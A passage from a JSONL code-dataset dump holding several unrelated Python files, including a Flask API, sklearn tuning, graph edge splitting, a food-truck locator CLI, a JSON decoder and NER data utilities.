200)\n\n@api.route('/comments/', methods=['GET'])\ndef get_comments():\n items = models.Comment.query.order_by('id').all()\n return JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n\n@api.route('/comments/', methods=['POST', 'PUT', 'DELETE'])\ndef change_comments():\n raise NotImplementedError\n\n@api.route('/posts//comments/', methods=['GET', 'POST', 'PUT', 'DELETE'])\ndef get_post_comments(id):\n raise NotImplementedError\n\n@api.route('/user//comments/', methods=['GET', 'POST', 'PUT', 'DELETE'])\ndef get_user_comments(id):\n raise NotImplementedError\n","sub_path":"server/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87369513","text":"import csv\nfrom sklearn.linear_model.logistic import LogisticRegression\nfrom sklearn.grid_search 
import GridSearchCV\nfrom sklearn import svm\nimport numpy as np\ndata=[]\nmark=[]\nwith open('/Users/hhy/Desktop/test/data.csv','r',encoding='utf-8_sig') as f:\n csv_reader=csv.reader(f)\n for x in csv_reader:\n data.append(list(map(float,x[0:-1])))\n mark.append(float(x[-1]))\n\nparam_test1= {'C':[x for x in np.arange(2,10,0.2)]}\nparameters = {'kernel': ('linear', 'sigmoid'), 'C': [2,2.1,2.2],'gamma':[0.00001,0.0001,0.0003,0.0005,0.001,0.002]}\n\n#cv = cross_validation.ShuffleSplit(len(data), n_iter=5, test_size=0.1, random_state=i)\n\ngsearch1= GridSearchCV(estimator = svm.SVC(random_state=1113),\n param_grid =parameters, scoring='roc_auc',cv=5)\ngsearch1.fit(data,mark)\nprint(gsearch1.grid_scores_,gsearch1.best_params_, gsearch1.best_score_)\n\n\n'''\ny_pred = gsearch1.predict(data)\ny_predprob = gsearch1.predict_proba(data)\nprint('准确率:',gsearch1.score(data, mark))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(mark, y_predprob))\n'''","sub_path":"Graduation/parameter_adjusting/FElogistic.py","file_name":"FElogistic.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55177779","text":"import os\nos.environ[\"PYTHON_EGG_CACHE\"] = \"/rds/projects/2018/hesz01/poincare-embeddings/python-eggs\"\n\nimport random\nimport numpy as np\nimport networkx as nx\n\nimport argparse\n\nfrom heat.utils import load_data\n\ndef write_edgelist_to_file(edgelist, file):\n\twith open(file, \"w+\") as f:\n\t\tfor u, v in edgelist:\n\t\t\tf.write(\"{}\\t{}\\n\".format(u, v))\n\ndef split_edges(edges, non_edges, seed, val_split=0.00, test_split=0.15, neg_mul=1):\n\t\n\tnum_val_edges = int(np.ceil(len(edges) * val_split))\n\tnum_test_edges = int(np.ceil(len(edges) * test_split))\n\n\trandom.seed(seed)\n\trandom.shuffle(edges)\n\trandom.shuffle(non_edges)\n\n\tval_edges = edges[:num_val_edges]\n\ttest_edges = edges[num_val_edges:num_val_edges+num_test_edges]\n\ttrain_edges = edges[num_val_edges+num_test_edges:]\n\n\tval_non_edges = non_edges[:num_val_edges*neg_mul]\n\ttest_non_edges = non_edges[num_val_edges*neg_mul:num_val_edges*neg_mul+num_test_edges*neg_mul]\n\n\treturn train_edges, (val_edges, val_non_edges), (test_edges, test_non_edges)\n\ndef parse_args():\n\t'''\n\tparse args from the command line\n\t'''\n\tparser = argparse.ArgumentParser(description=\"Script to remove edges for link prediction experiments\")\n\n\tparser.add_argument(\"--edgelist\", dest=\"edgelist\", type=str, default=\"datasets/cora_ml/edgelist.tsv\",\n\t\thelp=\"edgelist to load.\")\n\tparser.add_argument(\"--features\", dest=\"features\", type=str, default=\"datasets/cora_ml/feats.csv\",\n\t\thelp=\"features to load.\")\n\tparser.add_argument(\"--labels\", dest=\"labels\", type=str, default=\"datasets/cora_ml/labels.csv\",\n\t\thelp=\"path to labels\")\n\tparser.add_argument(\"--output\", dest=\"output\", type=str, default=\"edgelists/cora_ml\",\n\t\thelp=\"path to save training and removed edges\")\n\n\tparser.add_argument('--directed', action=\"store_true\", help='flag to train on directed graph')\n\n\tparser.add_argument(\"--seed\", type=int, default=0)\n\n\targs = parser.parse_args()\n\treturn args\n\ndef main():\n\n\targs = parse_args()\n\n\tseed= args.seed\n\ttraining_edgelist_dir = os.path.join(args.output, \"seed={:03d}\".format(seed), \"training_edges\")\n\tremoved_edges_dir = os.path.join(args.output, \"seed={:03d}\".format(seed), \"removed_edges\")\n\n\tif not 
os.path.exists(training_edgelist_dir):\n\t\tos.makedirs(training_edgelist_dir, exist_ok=True)\n\tif not os.path.exists(removed_edges_dir):\n\t\tos.makedirs(removed_edges_dir, exist_ok=True)\n\n\ttraining_edgelist_fn = os.path.join(training_edgelist_dir, \"edgelist.tsv\")\n\tval_edgelist_fn = os.path.join(removed_edges_dir, \"val_edges.tsv\")\n\tval_non_edgelist_fn = os.path.join(removed_edges_dir, \"val_non_edges.tsv\")\n\ttest_edgelist_fn = os.path.join(removed_edges_dir, \"test_edges.tsv\")\n\ttest_non_edgelist_fn = os.path.join(removed_edges_dir, \"test_non_edges.tsv\")\n\t\n\tgraph, features, node_labels = load_data(args)\n\tprint(\"loaded dataset\")\n\n\tedges = list(graph.edges())\n\tnon_edges = list(nx.non_edges(graph))\n\n\t_, (val_edges, val_non_edges), (test_edges, test_non_edges) = split_edges(edges, non_edges, seed)\n\n\tfor edge in test_edges:\n\t\tassert edge in graph.edges() or edge[::-1] in graph.edges()\n\n\tgraph.remove_edges_from(val_edges + test_edges)\n\tgraph.add_edges_from(((u, u, {\"weight\": 0}) for u in graph.nodes())) # ensure that every node appears at least once by adding self loops\n\n\tprint (\"removed edges\")\n\n\tnx.write_edgelist(graph, training_edgelist_fn, delimiter=\"\\t\", data=[\"weight\"])\n\twrite_edgelist_to_file(val_edges, val_edgelist_fn)\n\twrite_edgelist_to_file(val_non_edges, val_non_edgelist_fn)\n\twrite_edgelist_to_file(test_edges, test_edgelist_fn)\n\twrite_edgelist_to_file(test_non_edges, test_non_edgelist_fn)\n\n\tprint (\"done\")\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"remove_edges.py","file_name":"remove_edges.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142985466","text":"from setuptools import setup, find_packages\n\n\n__VERSION__ = '0.1'\n\nREQUIREMENTS = [\n\t'python-bitcoinlib'\n]\n\nsetup(\n\tname='exchange-payments',\n\tversion=__VERSION__,\n\tdescription='Exchange payments package',\n\tauthor='Juliano Gouveia',\n\tauthor_email='juliano@neosacode.com',\n\tkeywords='exchange, payments, neosacode, coins',\n\tinstall_requires=REQUIREMENTS,\n\tpackages=find_packages(exclude=[]),\n\tpython_requires='>=3.5'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639617212","text":"# -*- coding: utf-8 -*- \n\n# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:\n#Copyright (c) 2006 Ali Afshar aafshar@gmail.com\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n\nimport gtk\nimport pida.utils.vim.vimcom as vimcom\nimport pida.utils.vim.vimeditor as vimeditor\nimport pida.core.service as service\nimport pida.pidagtk.contentview as contentview\nimport pida.pidagtk.icons as icons\n\n\nclass vim_plugin_view(gtk.HBox):\n \"\"\"View holding the vim controls.\"\"\"\n\n def __init__(self, service):\n self.service = service\n gtk.HBox.__init__(self, spacing=3)\n icon = icons.icons.get_image('vim')\n self.pack_start(icon, expand=False)\n self.__serverlist = gtk.combo_box_new_text()\n self.pack_start(self.__serverlist)\n\n def set_serverlist(self, serverlist):\n current = self.__serverlist.get_active_text()\n self.__serverlist.get_model().clear()\n j = 0\n for i, server in enumerate(serverlist):\n self.__serverlist.append_text(server)\n if server == current:\n self.__serverlist.set_active(i)\n j = 1\n if j == 0:\n self.__serverlist.append_text('no vim running')\n self.__serverlist.set_sensitive(False)\n else:\n self.__serverlist.set_sensitive(True)\n if self.__serverlist.get_active() == -1:\n self.__serverlist.set_active(0)\n self.__serverlist.show_all()\n \n def get_current_server(self):\n return self.__serverlist.get_active_text()\n current_server = property(get_current_server)\n\n\nclass vim_multi_editor(vimeditor.vim_editor, service.service):\n\n display_name = 'External Vim'\n\n def start(self):\n self.__oldservers = []\n self.view = vim_plugin_view(service=self)\n self.__cw = vimcom.communication_window(self)\n self.view.show_all()\n self.get_service('buffermanager').\\\n plugin_view.widget.pack_start(self.view, expand=False)\n self.get_service('editormanager').events.emit('started')\n\n def vim_new_serverlist(self, serverlist):\n def _serverlist():\n for server in serverlist:\n if 'PIDA_EMBEDDED' not in server:\n if server not in self.__oldservers:\n self.__cw.init_server(server)\n yield server\n self.view.set_serverlist(_serverlist())\n self.__oldservers = serverlist\n\n def get_server(self):\n return self.view.current_server\n server = property(get_server)\n\n\nService = vim_multi_editor\n\n","sub_path":"branches/newview/pida/editors/vimmultiedit.py","file_name":"vimmultiedit.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"241444996","text":"import numpy as np\nimport random\n\nnumtrained = 100\nnumtest = 10000\ntrainerror = .1\n\ndef nonlin(x, deriv=False):\n if (deriv == True):\n return x * (1 - x)\n return 1 / (1 + np.exp(-x))\n\ninp = []\nout = []\nfor x in range(numtrained):\n xval = random.random()*4 - 2\n yval = random.random()*4 - 2\n inp.append([xval,yval,1])\n if xval**2+yval**2<1:\n out.append([1])\n else:\n out.append([0])\nX = np.array(inp)\ny = np.array(out)\n\nnp.random.seed(1)\nsyn0 = 2 * np.random.random((3, 4)) - 1\nsyn1 = 2 * np.random.random((4, 1)) - 1\n\nerror = 9999.9\nit = 0\nwhile error > trainerror:\n it+=1\n l0 = X\n l1 = nonlin(np.dot(l0, syn0))\n l2 = nonlin(np.dot(l1, syn1))\n l2_error = y - l2\n # if it%100==0:\n print(\"Error:\" + str(np.mean(np.abs(l2_error))))\n error = np.mean(np.abs(l2_error))\n l2_delta = l2_error * nonlin(l2, deriv=True)\n l1_error = l2_delta.dot(syn1.T)\n l1_delta = l1_error * nonlin(l1, deriv=True)\n\n syn1 += 
l1.T.dot(l2_delta)\n syn0 += l0.T.dot(l1_delta)\n\ninptest = []\nouttest = []\nfor i in range(numtest):\n xval = random.random()*4 - 2\n yval = random.random()*4 - 2\n inptest.append([xval,yval,1])\n if xval**2+yval**2<1:\n outtest.append([1])\n else:\n outtest.append([0])\nxtest = np.array(inptest)\nytest = np.array(outtest)\nl0test = xtest\nl1test = nonlin(np.dot(l0test, syn0))\nl2test = nonlin(np.dot(l1test, syn1))\n# print(l2test.tolist())\n# print(ytest.tolist())\nexpY = l2test.tolist()\ntheY = ytest.tolist()\nwrong = 0\nfor k in range(len(expY)):\n for o in range(len(expY[k])):\n if (expY[k][o]>.5 and theY[k][o]==0) or (expY[k][o]<.5 and theY[k][o]==1):\n wrong += 1\nprint(wrong,'wrong out of',numtest)\n\nprint('\\nWeights:',syn0,',',syn1)\nprint('\\nIterations:',it)","sub_path":"unitcircle-numpy.py","file_name":"unitcircle-numpy.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202740625","text":"from brainfuck import BFInterpreter\nimport signal\n\ndigit_to_command = {\n 0 : \">\",\n 1 : \"<\",\n 2 : \"+\",\n 3 : \"-\",\n 4 : \".\",\n 5 : \"[\",\n 6 : \"]\"\n}\n\n\ndef to_program(num):\n program = \"\"\n while num > 0:\n program += digit_to_command[num % 7]\n num //= 7\n return program\n\n\ndef timeout(signum, frame):\n print(\"Timeout\")\n raise Exception(\"Time out\")\n\ndef main():\n bf = BFInterpreter()\n counter = 0\n while True:\n program = to_program(counter)\n try:\n print(program, end=' ')\n signal.signal(signal.SIGALRM, timeout)\n signal.alarm(1)\n bf.evaluate(program)\n bf.reset()\n print()\n except:\n bf.reset()\n print()\n counter += 1\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"minimal_hello.py","file_name":"minimal_hello.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"349214021","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport csv\nimport json\nimport os\nimport pickle\nfrom io import StringIO\n\nfrom sffdtruck import CONSTS, __version__, kdtree\nfrom sffdtruck.retrieve import retrieve\n\n# Importing 3rd party distance calculation packages\n# If not downloaded, we'll use local version.\n# We've added a local version to make\ntry:\n from vincenty import vincenty as dist_vincenty\nexcept ImportError:\n from sffdtruck.external.vincenty import vincenty as dist_vincenty\n\ntry:\n from haversine import haversine as dist_haversine\nexcept ImportError:\n from sffdtruck.external.haversine import haversine as dist_haversine\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(\"sffdtruck\")\n version = \"%(prog)s \" + __version__\n parser.add_argument(\n \"--lat-lon\",\n \"-l\",\n nargs=2,\n dest=\"lat_lon\",\n required=True,\n help=\"\"\"Specify target (latitude, longitude). Eg. 
`-l -37.234124 74.812810`\"\"\",\n )\n parser.add_argument(\n \"--update\",\n default=False,\n action=\"store_true\",\n help=\"\"\"Update existing cache.\"\"\",\n )\n parser.add_argument(\n \"--timeout\", \"-t\", default=3, type=int, help=\"\"\"Download timeout.\"\"\"\n )\n parser.add_argument(\n \"--count\", \"-c\", default=5, type=int, help=\"\"\"Number of locations to return.\"\"\",\n )\n parser.add_argument(\n \"--radius\",\n \"-r\",\n default=float(\"Inf\"),\n type=float,\n help=\"\"\"Return results within {radius} Miles.\"\"\",\n )\n parser.add_argument(\n \"--dist\",\n \"-d\",\n default=\"haversine\",\n choices=[\"euclidean\", \"e\", \"haversine\", \"h\", \"vincenty\", \"v\"],\n help=\"\"\"Distance calculation function\"\"\",\n )\n parser.add_argument(\n \"--format\",\n \"-f\",\n default=\"plain\",\n choices=[\"csv\", \"json\", \"plain\"],\n help=\"\"\"Output format (shown in closest-first order)\"\"\",\n )\n parser.add_argument(\"--version\", \"-v\", action=\"version\", version=version)\n return parser\n\n\ndef get_dist_fn(dist_type, radius_miles=float(\"Inf\")):\n def radius_dist(p1, p2, dist_fn):\n d = dist_fn(p1, p2)\n # Convert to km\n if d <= radius_miles * 1.609344:\n return d\n else:\n return float(\"Inf\")\n\n if dist_type[0] == \"h\":\n dist_fn = dist_haversine\n elif dist_type[0] == \"v\":\n dist_fn = dist_vincenty\n else:\n dist_fn = kdtree.dist_sq\n\n if radius_miles != float(\"Inf\"):\n if dist_type[0] == \"e\":\n print(\n \"Euclidean lat/lon distance is not a real distance. Use Haversine or Vincenty distance for radius search\\n\"\n )\n else:\n return lambda p1, p2: radius_dist(p1, p2, dist_fn)\n\n return dist_fn\n\n\ndef get_output(out_type, input_nodes):\n if input_nodes is None or len(input_nodes) == 0:\n return \"Nothing was found in the search!!\"\n\n capture = [\"Applicant\", \"Address\", \"FacilityType\", \"FoodItems\"]\n console_format = [\n \"Food Truck Name : {}\",\n \"Address : {}\",\n \"Truck Type : {}\",\n \"Available Items : {}\",\n \"Location : {}\",\n ]\n out = None\n if out_type[0] == \"c\":\n header = \",\".join(capture) + \",Location\\n\"\n with StringIO() as sio:\n sio.writelines(header)\n for inode in input_nodes:\n sio.writelines(\n [\n \",\".join([inode.ft_data.data[c] for c in capture]),\n f',{inode.ft_data.data[\"Location\"]}',\n \"\\n\",\n ]\n )\n out = sio.getvalue()\n elif out_type[0] == \"j\":\n out = {\n \"food_trucks\": [\n {\n **{c: inode.ft_data.data[c] for c in capture},\n **{\"Location\": inode.ft_data.latlon},\n }\n for inode in input_nodes\n ]\n }\n out = json.dumps(out, indent=2)\n else:\n with StringIO() as sio:\n sio.writelines(\"----(Closest)---- \\n\")\n for inode in input_nodes:\n form_val = [inode.ft_data.data[c] for c in capture]\n form_val.append(inode.ft_data.latlon)\n sio.writelines(\"\\n\".join(console_format).format(*form_val))\n sio.writelines(\"\\n-----------------\\n\")\n out = sio.getvalue()\n\n return out\n\n\ndef main(args=None):\n args = arg_parser().parse_args(args)\n # Initilize cache dir\n if not os.path.exists(CONSTS.cache_dir):\n os.makedirs(CONSTS.cache_dir)\n\n csv_bytes, is_newer = retrieve(check_update=args.update, timeout=args.timeout)\n if is_newer:\n # We read CSV and 're-'build KDTree cache\n try:\n with StringIO(csv_bytes) as sio:\n all_csv_entries = list(csv.DictReader(sio))\n valid_entries = [\n kdtree.FTData(d)\n for d in all_csv_entries\n if float(d[\"Latitude\"]) != 0 and float(d[\"Longitude\"]) != 0\n ]\n if len(all_csv_entries) != len(valid_entries):\n print(\n f\"There were 
{len(all_csv_entries) - len(valid_entries)} entries with no Lat/Lon values\"\n )\n tree_root = kdtree.FTNode.build_tree(valid_entries)\n if tree_root is None:\n raise ValueError(\"Cannot create tree from CSV data\")\n with open(CONSTS.kdtree_cache_file, \"wb\") as f:\n pickle.dump(tree_root, f, pickle.HIGHEST_PROTOCOL)\n # Pickle the 'data' dictionary using the highest protocol available.\n except Exception as e:\n print(\"Could not read csv and create tree\", e)\n exit(1)\n else:\n try:\n with open(CONSTS.kdtree_cache_file, \"rb\") as f:\n tree_root = pickle.load(f)\n except Exception as e:\n print(\"Cannot unpickle cached data\", e)\n exit(1)\n\n # Now we have a tree_root\n # Perform the search\n lat_lon = (float(args.lat_lon[0]), float(args.lat_lon[1]))\n res = tree_root.search(\n lat_lon, k=args.count, dist_fn=get_dist_fn(args.dist[0], args.radius)\n )\n\n # s=json.dumps({'output':[r.ft_data.to_json() for r in res]}, indent=2)\n # for r in res:\n print(get_output(args.format, res))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sffdtruck/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420203457","text":"import re\n\nFLAGS = re.DOTALL | re.MULTILINE | re.VERBOSE\n\nSTRINGCHUNK = re.compile(r'(.*?)([\"\\\\\\x00-\\x1f])', FLAGS)\nNUMBER = re.compile(r'(-?(?:0|[1-9]\\d*))(\\.\\d+)?([eE][-+]?\\d+)?', FLAGS)\n\nBACKSLASH_DICT = {\n '\"': '\"', '\\\\': '\\\\', '/': '/',\n 'b': '\\b', 'f': '\\f', 'n': '\\n', 'r': '\\r', 't': '\\t',\n}\n\n\nclass JSONDecoderError(ValueError):\n def __init__(self, msg, json_str, pos):\n lineno = json_str.count('\\n', 0, pos) + 1\n colno = pos - json_str.rfind('\\n', 0, pos)\n error_msg = '{0}: line {1} column {2} (char {3})'.format(msg, lineno, colno, pos)\n super().__init__(error_msg)\n\n\ndef decode_string(s, backslash=BACKSLASH_DICT, chunk_match=STRINGCHUNK.match):\n \"\"\"Scan the string s for a JSON string.\"\"\"\n\n chunks = []\n begin, end = 0, 1\n while True:\n chunk = chunk_match(s, end)\n if chunk is None:\n raise JSONDecoderError('Unterminated string starting at', s, begin)\n end = chunk.end()\n content, terminator = chunk.groups()\n if content:\n chunks.append(content)\n if terminator == '\"':\n break\n elif terminator != '\\\\':\n raise JSONDecoderError('Invalid control character {!r} at'.format(terminator), s, end - 1)\n try:\n esc = s[end]\n except IndexError:\n raise JSONDecoderError('Unterminated string starting at', s, begin) from None\n try:\n char = backslash[esc]\n except KeyError:\n raise JSONDecoderError('Invalid \\\\escape: {!r}'.format(esc), s, end - 1)\n end += 1\n chunks.append(char)\n\n return ''.join(chunks)\n\n\ndef decode_array(json_array):\n sep = ', '\n arr = json_array[1:-1].split(sep)\n for idx in range(len(arr)):\n if idx == len(arr):\n break\n c1 = arr[idx].count('[')\n c2 = arr[idx].count(']')\n c3 = arr[idx].count('{')\n c4 = arr[idx].count('}')\n if c1 > c2 >= 0 or c3 > c4 >= 0:\n while c1 != c2 or c3 != c4:\n try:\n arr[idx] += sep + arr[idx + 1]\n del arr[idx + 1]\n except IndexError:\n raise JSONDecoderError('Unterminated json array starting at', json_array, 0) from None\n c1 = arr[idx].count('[')\n c2 = arr[idx].count(']')\n c3 = arr[idx].count('{')\n c4 = arr[idx].count('}')\n\n python_list = []\n for s in arr:\n if s != '':\n obj = from_json(s)\n python_list.append(obj)\n\n return python_list\n\n\ndef decode_object(json_obj):\n python_dict = {}\n item_sep = ', '\n key_sep 
= ': '\n arr = json_obj[1:-1].split(item_sep)\n idx = 0\n while idx != len(arr) - 1:\n next_idx = idx + 1\n c1 = arr[idx].count('{')\n c2 = arr[idx].count('}')\n if arr[next_idx].count(key_sep) and c1 == c2:\n idx += 1\n else:\n arr[idx] += item_sep + arr[next_idx]\n del arr[next_idx]\n\n for item in arr:\n res = item.split(key_sep)\n if len(res) >= 2:\n key, val = from_json(res[0]), res[1]\n if not isinstance(key, str):\n raise JSONDecoderError('Expecting property name enclosed in double quotes',\n json_obj, json_obj.index(res[0]))\n for i in range(2, len(res)):\n val += key_sep + res[i]\n python_dict[key] = from_json(val)\n else:\n raise JSONDecoderError('Invalid json object starting at', json_obj, 0)\n\n return python_dict\n\n\ndef decode_number(num, number_match):\n idx = 0\n match = number_match(num, idx)\n if match is not None:\n integer, frac, exp = match.groups()\n valid_str = ''\n for item in match.groups():\n if item:\n valid_str += str(item)\n if num != valid_str:\n return None\n if frac or exp:\n res = float(integer + (frac or '') + (exp or ''))\n else:\n res = int(integer)\n return res\n elif num == 'NaN':\n return float('nan')\n elif num == 'Infinity':\n return float('inf')\n elif num == '-Infinity':\n return float('-inf')\n else:\n return None\n\n\ndef from_json(json_string):\n \"\"\"Deserialize a JSON formatted string to a Python object.\"\"\"\n\n if json_string.startswith('\"') and json_string.endswith('\"'):\n return decode_string(json_string)\n elif json_string == 'null':\n return None\n elif json_string == 'true':\n return True\n elif json_string == 'false':\n return False\n elif json_string.startswith('[') and json_string.endswith(']'):\n return decode_array(json_string)\n elif json_string.startswith('{') and json_string.endswith('}'):\n return decode_object(json_string)\n else:\n number = decode_number(json_string, NUMBER.match)\n if number is not None:\n return number\n raise JSONDecoderError('Invalid JSON string', json_string, 0)\n","sub_path":"Solutions/Task2/853502_Павел_Курейчик/Lab2/jsonformatter/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579067731","text":"# function takes a list of cards and returns all possible 3+ runs, trips, quads\n# suits h, d, c, s\ndef findTrips(cards):\n\tprint ('this is the list that was recv\\'d')\n\tprint ('--------------------------------')\n\tprint (cards)\n\timport copy\n\tcardsCopy = copy.deepcopy(cards)\n\t\n\t# test for 3 of a kind\n\tcardsCopy.sort()\n\tprint ('this is a copy sorted by value')\n\tprint ('------------------------------')\n\tprint (cardsCopy)\n\t# test for 4 of a kind\n\t\n\ttripsCount = 0\n\tfor i in range(len(cardsCopy)-2):\n\t\tif cardsCopy[i][0] == cardsCopy[i+1][0] == cardsCopy[i+2][0]:\t# then there's def trips\n\t\t\t# load each card to var\n\t\t\tfirst = cardsCopy[i]\n\t\t\tsecond = cardsCopy[i+1]\n\t\t\tthird = cardsCopy[i+2]\n\t\t\t\n\t\t\tprint ('trips have been found')\n\t\t\tprint ('---------------------')\n\t\t\tprint (str(first) + ' ' + str(second) + ' ' + str(third))\n\t\n\t\t\ttripsCount = tripsCount + 1\n\t# summary\n\tprint (str(tripsCount) + ' sets of trips found')\n\t# error test\n\tif tripsCount != 3:\n\t\tprint ('3 SETS OF TRIPS NOT DETECTED')\n\t\texit()\n\t\n\nmyHand = [[1, 'h'], [2, 'h'], [3, 'h'], [9, 'd'], [8, 'c'], [7, 'h'], [5, 'd'], [5, 'c'], [5, 's'], [5, 'h'], [12, 's'], [12, 'h'], [12, 'd']]\nfor i in range(1000):\n\timport 
random\n\trandom.shuffle(myHand)\n\tresults = findTrips(myHand)\n","sub_path":"findPoints.py","file_name":"findPoints.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"60359276","text":"# -*-encoding:utf-8-*-\nimport os, sys, re, codecs, json\nimport pickle\nimport numpy as np\nfrom data_utils import create_dico, create_mapping, zero_digits, get_feature_func\n\n\ndef load_feature_dict(path, config):\n\twith open(path, \"rb\") as f:\n\t\tf_list = pickle.load(f)\n\tfeature_dict = {\"\": {\"idx\": 0}, \"\": {\"idx\": 1}}\n\tfor x, y in enumerate(f_list):\n\t\tfeature = y[0].decode(\"utf-8\")\n\t\tidx = feature.rfind(\":\")\n\t\tf_idx = int(feature[:idx][1])\n\t\tif f_idx in config[\"feature_list\"]:\n\t\t\tfeature_dict[feature] = y[1]\n\t\t\tfeature_dict[feature].update({\"idx\": len(feature_dict)})\n\n\treturn feature_dict\n\n\ndef load_elmo_dict(path):\n\telmo_dict = {}\n\twith open(path, \"rb\") as f:\n\t# with open(path) as f:\n\t\tfor line in f.readlines():\n\t\t\t# print(\"raw line : \", line)\n\t\t\t# print(\"1 line : \", line.decode(\"utf-8\"))\n\t\t\tline = line.decode(\"utf-8\")\n\t\t\tline = line.strip()\n\t\t\telmo_dict[line] = len(elmo_dict)\n\n\treturn elmo_dict\n\n\ndef _load_conll_file(path):\n\t\"\"\"\n\tReads a file and returns its contents as a list of sentences.\n\t\"\"\"\n\tsentences = []\n\tsentence = [[], [], []]\n\n\twith codecs.open(path, 'r', 'utf-8') as fp:\n\t\tfor line in fp: # line by line\n\t\t\tline = line.rstrip()\n\n\t\t\tif not line: # the sentence has ended\n\t\t\t\tif len(sentence) > 0:\n\t\t\t\t\tsentences.append(sentence) # store it\n\t\t\t\t\tsentence = []\n\t\t\telse: # the sentence is still in progress\n\t\t\t\tword = line.split()\n\t\t\t\tsentence.append(word)\n\t\tif len(sentence) > 0:\n\t\t\tsentences.append(sentence)\n\treturn sentences\n\n\ndef eojeol_mapping(sentences):\n\t\"\"\"\n\tBuilds the eojeol (word phrase) dictionary. 
Probably unused...\n\t\"\"\"\n\teojeol = [[[word] for word in s[-2]] for s in sentences]\n\tdico = create_dico(eojeol)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\teojeol_to_id, id_to_eojeol = create_mapping(dico)\n\tprint(\"Found %i unique words\" % (len(dico)))\n\treturn dico, eojeol_to_id, id_to_eojeol\n\n\ndef word_mapping(sentences):\n\t\"\"\"\n\tBuilds the word dictionary.\n\t\"\"\"\n\twords1 = [[[word] for word in s[1]] for s in sentences]\n\twords2 = [[[word] for word in s[2]] for s in sentences]\n\twords3 = [[[word] for word in s[3]] for s in sentences]\n\twords4 = [[[word] for word in s[4]] for s in sentences]\n\tdico = create_dico(words1 + words2 + words3 + words4)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\tword_to_id, id_to_word = create_mapping(dico)\n\tprint(\"Found %i unique words\" % (len(dico)))\n\treturn dico, word_to_id, id_to_word\n\n\ndef pumsa_mapping(sentences):\n\t\"\"\"\n\tBuilds the pumsa (part-of-speech) dictionary.\n\t\"\"\"\n\tpumsas1 = [[[word] for word in s[5]] for s in sentences]\n\tpumsas2 = [[[word] for word in s[6]] for s in sentences]\n\tpumsas3 = [[[word] for word in s[7]] for s in sentences]\n\tpumsas4 = [[[word] for word in s[8]] for s in sentences]\n\tdico = create_dico(pumsas1 + pumsas2 + pumsas3 + pumsas4)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\tpumsa_to_id, id_to_pumsa = create_mapping(dico)\n\tprint(\"Found %i unique pumsa\" % (len(pumsa_to_id)))\n\treturn dico, pumsa_to_id, id_to_pumsa\n\n\ndef char_mapping(sentences, lower):\n\t\"\"\"\n\tBuilds the syllable (character) dictionary.\n\t\"\"\"\n\tif lower:\n\t\tchars = [[[char for char in word.lower()] for word in s[-2]] for s in sentences]\n\telse:\n\t\tchars = [[[char for char in word] for word in s[-2]] for s in sentences]\n\tdico = create_dico(chars)\n\tdico[\"\"] = 10000001\n\tdico[''] = 10000000\n\tchar_to_id, id_to_char = create_mapping(dico)\n\tprint(\"Found %i unique chars\" % (len(dico)))\n\treturn dico, char_to_id, id_to_char\n\n\ndef tag_mapping(sentences):\n\t\"\"\"\n\tCreate a dictionary and a mapping of tags, sorted by frequency.\n\t\"\"\"\n\ttags = [[tag for tag in s[-1]] for s in sentences]\n\tdico = create_dico(tags)\n\ttag_to_id, id_to_tag = create_mapping(dico)\n\tprint(\"Found %i unique tags\" % len(dico))\n\treturn dico, tag_to_id, id_to_tag\n\n\ndef load_word_embedding_matrix(config, embed_file_path, word_to_id):\n\tprint(\"Loading 